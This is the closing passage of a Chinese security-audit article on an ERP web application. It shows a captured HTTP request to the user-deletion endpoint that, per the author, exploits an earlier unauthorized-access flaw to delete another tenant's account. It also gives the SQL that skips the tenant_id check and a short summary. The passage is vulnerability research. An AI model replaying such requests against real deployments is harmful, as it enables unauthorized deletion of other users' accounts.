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
<p>抓包</p>
<pre><code>POST /user/deleteUser HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706618997,1706707611,1706717491; JSESSIONID=67A20DB5D3DCEF7277316B22B9D579C3; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706790058
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
ids=135</code></pre>
<p>利用前面的未授权漏洞修改请求删除132账户</p>
<p><a id=img33 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233723-cb6f4174-c117-1.png><img src="data:image/png;base64,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
<p>删除成功,此时数据库中的数据</p>
<p><a id=img34 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233734-d1b5edf8-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABSYAAAE5CAYAAACNnf4WAACfkklEQVR4nO39e3QU150vfH+rWzcjYSkJGOxMgi11g1HIxWRCQJrBZ5YNQSIOOBOIz/M8x3AcIpkwWJ3YTEKGzMw58RuSYE9aZhwshfGA13ueE4MzQGwkguw1x2QQhIxxbMvC0C1hkokBwyQtQLaE1F3PH1XdXVVd3bWr75fvZy0tm+7qXbv23lXV9et9kQKBgAwAVVVVoPT73e9+h+nTp+c6G0REKbl06RJcLleus0FERERERERFxJHrDBAREREREREREVHpYWCSiIiIiIiIiIiIsq4s/D+/+93vcpkPIiLKc36/P9dZICIiIiIioiIiheeYJCIiIiIiIiIiIsoWDuUmIiIiIiIiIiKirGNgkoiIiIiIiIiIiLKOgUkiIiIiIiIiIiLKOgYmiYiIiIiIiIiIKOsYmCQiIiIiIiIiIqKsY2CSiIiIiIiIiIiIso6ByTx16dKlXGeBiHKM1wEiIiIiIiIqZgxMEhERERERERERUdYxMElERERERERERERZx8AkERERERERERERZR0Dk0RERERERERERJR1DEwSERERERERERFR1pWJbHTlyhWcPn0a586dw5UrV/Dee+8BAKZMmYIbb7wRs2bNwpw5c3DjjTdmNLMkJhQK4dixYzh16hSuXbsW8/7HP/5x/MVf/AUcDsalS9Gn90/FKyuv5jobGff222/jxRdf1J0Df//BvzPd9u//8D8i/19TU4O7774bt956a6azmDFW1wBAOc65c+di0aJFRXEtKMVjBoBz587h7NmzOH/+PEZHRzE2NgYAqKqqQnV1NWbOnIn6+nrMmjUrxzktLt/9TRWeOlWBB+dex3c+NZbr7BARERERFSwpEAjIiTZ47bXX8Nprr+FjH/sYbrnlFtTW1qKyshIAMD4+jpGREbzzzjt488038clPfhKf/OQns5LxYnfp0iVMnz49qc8ePXoUly9fxt13343q6mrde16vF3/yJ3+CUCiEz3/+85gyZUo6sltw+vv78corryAYDApt73Q68elPfxpNTU0Zzlnm1T1Ti8D9I5F/7969G3/84x9Nt/3ABz6ANWvWZCtrabVz586YAKPx2M1eO3v2LF566SWsW7cuW1mNK9nrQKJrQNjo6ChefPFFTJs2Dc3NzalmNedK8ZgP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
<p>相关的sql语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>status</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>WHERE</span> <span class=n>id</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'132'</span><span class=p>)</span>
</pre></div>
<p>另外在不使用未授权漏洞进行删除时sql语句中存在对tenant_id字段的判断如下sql语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_user</span> <span class=k>SET</span> <span class=n>status</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>WHERE</span> <span class=n>jsh_user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'132'</span><span class=p>)</span>
</pre></div>
<h2 id=toc-21>总结</h2>
<p>后续通过学习codeql来提高审计效率漏洞寻找过程并不困难写出来需要花费时间文章写的匆忙代码中关键处含有注释若有错误请批评指正</p>
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=13525>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>5</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=13525>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/13524 title="Nosql inject-InfluxDB"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>Nosql inject-Infl...</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/13526 title=Weiphp3.0&amp;&amp;5.0前台rce&amp;&amp;sql注入分析><span class=related-label>下一篇:</span>Weiphp3.0&amp;&amp;5.0前台r...</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=13525>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>0 条回复</li>
</ol>
<div class="box-container post-container">
<ul>
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F13525&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div>
Reference in New Issue Copy Permalink